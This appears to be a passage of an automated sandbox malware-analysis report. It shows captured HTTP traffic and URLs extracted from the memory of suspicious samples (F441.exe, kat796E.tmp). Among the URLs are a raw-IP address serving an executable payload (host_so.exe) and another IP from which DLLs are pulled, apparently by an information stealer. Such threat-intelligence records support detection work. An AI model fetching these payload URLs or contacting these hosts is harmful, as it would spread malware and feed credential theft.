"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDmw_c^nUSssD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/S
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2558054153.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000000.2358201708.00000000004B4000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000001.00000000.1694112047.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1693681888.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1695682915.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1697094973.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832497787.000000001B96D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://65.109.242.59
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/#X
Source: kat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/A
Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2550138162.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/B
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/D
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/GX
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/NX
Source: kat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/T
Source: kat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/U
Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/dX
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/f
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll$
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllment
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllze
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll~
